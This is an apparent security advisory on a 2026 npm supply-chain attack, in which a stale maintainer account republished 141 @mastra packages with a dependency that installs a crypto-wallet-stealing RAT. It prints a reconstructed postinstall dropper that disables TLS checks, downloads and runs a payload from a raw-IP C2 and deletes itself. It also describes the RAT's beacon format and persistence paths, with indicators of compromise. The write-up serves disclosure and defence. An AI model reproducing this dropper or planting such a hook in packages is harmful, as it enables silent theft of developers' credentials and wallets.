Mastra npm Scope Takeover: 141 Packages Drop a RAT

TL;DR

In the early hours of June 17, 2026 (UTC), an attacker using the npm account ehindero republished 141 packages in the @mastra scope, including @mastra/core, mastra, and create-mastra, in a burst that ran from 01:12 to 02:36. The library code was left untouched. The only change was a single new dependency added to each package: easy-day-js, a clone of dayjs that downloads and runs a cryptocurrency-stealing remote access trojan when you install it. The attacker laid the groundwork a day earlier: on June 16 they published the clean easy-day-js, then flipped on the malicious version minutes before the scope-wide republish.

The ehindero account was a real former Mastra contributor whose scope access was never revoked. npm has since pulled the malicious versions from the highest-profile packages and reverted their latest tag, but smaller packages and easy-day-js itself can still resolve to the payload.

If you installed an affected @mastra/* version since June 16, 2026, treat the machine as compromised. Roll back to a pre-incident version, rotate any credentials it could reach (cloud keys, LLM API keys, and any cryptocurrency wallets), and check the host for the artifacts listed at the bottom of this post.

Jump to the full list of compromised packages

How it works

The attacker never touched the Mastra source. Every malicious release adds exactly one line to package.json:

1
// @mastra/[email protected] package.json (excerpt)
2
"dependencies": {
3
  "easy-day-js": "^1.11.21",
4
  ...
5
}

easy-day-js is a copy of dayjs, published a day earlier by a related account, sergey2016. It exists in two versions, and the split is the trick:

• 1.11.21 is a clean dayjs copy with no install hooks.
• 1.11.22 adds a postinstall hook that runs the malware, and is tagged latest.

The @mastra packages depend on ^1.11.21. Because 1.11.22 satisfies that caret range, npm install resolves to it. Audit the pinned 1.11.21 and you read a harmless date library. The payload rides in on 1.11.22, the version npm actually installs.

Provenance Dropped

Mastra ships its real releases from CI through npm’s trusted publisher flow, and each one carries SLSA provenance attestations. The attacker pushed the malicious versions from a personal token and dropped the provenance. The difference shows up on any two adjacent versions:

1
@mastra/[email protected]
2
publisher: [email protected]
3
provenance: yes
4
easy-day-js:  no
5

6
@mastra/[email protected]
7
publisher: [email protected]
8
provenance: no
9
easy-day-js:  yes

The same fingerprint repeats across the whole scope. Mastra generated provenance on CI publishes but did not require it, so a standard npm token could still publish without attestations. A signature-verifying install (npm audit signatures, or a policy that requires attestations) would have rejected every package in this wave.

How the attacker got in

The ehindero account was not a throwaway. Between November 2024 and February 2025 it published 15 alpha versions of @mastra/core (0.1.27-alpha.0 through 0.2.0-alpha.87), all clean, under the email [email protected]. The June 17 malicious publishes came from the same account name with a different email, [email protected], the same <name>[email protected] pattern as the sergey2016 account that published easy-day-js.

The email swap on a 16-month-dormant account points to an account takeover of a former contributor whose scope access was never revoked. npm does not expire scope permissions on inactivity, so one stale maintainer credential was enough to publish to the entire scope.

The dropper

The postinstall hook runs setup.cjs, which ships obfuscated. Stripped of the obfuscation, the flow is short: it turns off TLS verification so an HTTPS fetch works against a self-signed cert on a raw IP, downloads the real malware from 23.254.164[.]92 instead of shipping it in the package, runs it as a detached background process with no console output, and then deletes itself. Keeping the payload off the registry means a scan of easy-day-js finds nothing but a date library.

1
// reconstructed [email protected] setup.cjs
2
process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0'; // accept any TLS cert
3

4
(async () => {
5
  try {
6
    const c2 = 'https://23.254.164.92:8000/update/49890878';
7

8
    // download the second stage and write it to a random temp file
9
    const payload = await (await fetch(c2)).text();
10
    const file = path.join(os.tmpdir(), crypto.randomBytes(12).toString('hex') + '.js');
11
    fs.writeFileSync(file, payload, 'utf8');
12

13
    // run it in the background, handing it a second C2 to call home to
14
    child_process
15
      .spawn(process.execPath, [file, '23.254.164.123:443'], {
16
        cwd: os.tmpdir(),
17
        detached: true,
18
        stdio: 'ignore',
19
        windowsHide: true,
20
      })
21
      .unref();
22
  } catch {
23
  } finally {
24
    fs.rmSync(__filename, { force: true }); // delete setup.cjs
25
  }
26
})();

What the second stage does

The dropper hands the second stage a separate address, 23.254.164[.]123:443, and the C2 only serves the payload to a request whose User-Agent is Node’s default. A browser or curl request gets a 404, which is why some early reports called the payload unreachable. Pulled with the right User-Agent, it is a 41 KB obfuscated script (SHA256 221c45a7...badf), a multi-platform cryptocurrency stealer.

It reads Chrome, Brave, and Edge profiles looking for a hardcoded list of 166 cryptocurrency wallet extensions (MetaMask, Phantom, Solflare, Coinbase Wallet, OKX, Keplr, and 160 more), then installs persistence disguised as Node tooling so it survives a reboot:

Talking to the C2

The RAT builds its C2 URL from the address the dropper handed it, hxxps://23.254.164[.]123/49890878, reusing the campaign ID /49890878 that also names the dropper endpoint. The first beacon is a single HTTPS POST carrying everything it collected, as base64-encoded JSON: username, hostname, OS and architecture, Node version, installed apps, wallet extensions, browser history, and running processes. The server answers an empty 200 when it has nothing to say, and the RAT sleeps ten minutes (configurable) before checking back. A command comes back tagged tpcsr. The RAT runs it and posts results tagged r0. It saves its config (victim ID, current C2, interval) to config.json under the platform NodePackages directory so a pushed C2 change survives reboots, and it derives fallback C2 addresses by XOR-ing the primary IP with a counter.

The initial beacon, base64-decoded, looks like this:

1
{
2
  "type": "prepare",
3
  "targetId": "<generated-uid>",
4
  "info": {
5
    "common": { "username": "...", "hostname": "...", "osarch": "linux_x64 :: Node v22.22.2" },
6
    "appInfo": [],
7
    "extInfo": [],
8
    "historyInfo": [],
9
    "procInfo": []
10
  }
11
}

Unlike the dropper endpoint, this RAT C2 was still live and accepting beacons at the time of analysis, fronted by a default wolfSSL test certificate (CN=www.wolfssl.com, expired January 2018).

The Hostwinds hosting, the clean-then-armed typosquat, the setup postinstall dropper (TLS off, detached spawn, self-delete), and the crypto-wallet-stealing payload all match the Axios npm compromise that Microsoft attributed to Sapphire Sleet (BlueNoroff) earlier in 2026. Attribution for this incident is not confirmed, but the tradecraft overlap is close.

Indicators of Compromise

Accounts and packages

• npm accounts ehindero ([email protected]) and sergey2016 ([email protected])
• Any @mastra/* package.json with "easy-day-js": "^1.11.21" and no provenance attestations
• [email protected] (postinstall: node setup.cjs) is the dropper; 1.11.21 is the clean precursor

Network

• Dropper C2 23.254.164[.]92:8000/update/49890878 (User-Agent gated) and RAT C2 23.254.164[.]123/49890878 (HTTPS POST beacons, still live), both Hostwinds hosts (hwsrv-1327786 / hwsrv-1327785.hostwindsdns.com) in 23.254.164.0/24
• Shared campaign ID /49890878; beacon interval 10 min (configurable); RAT C2 TLS cert CN=www.wolfssl.com (expired Jan 2018)
• Second-stage C2 User-Agent: mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)

Host artifacts

• Temp dir: .pkg_history, .pkg_logs, and a randomly named <hex>.js
• macOS: ~/Library/LaunchAgents/com.nvm.protocal.plist, ~/Library/NodePackages/protocal.cjs
• Linux: ~/.config/systemd/user/nvmconf.service, ~/.config/NodePackages
• Windows: C:\ProgramData\NodePackages

Full list of compromised packages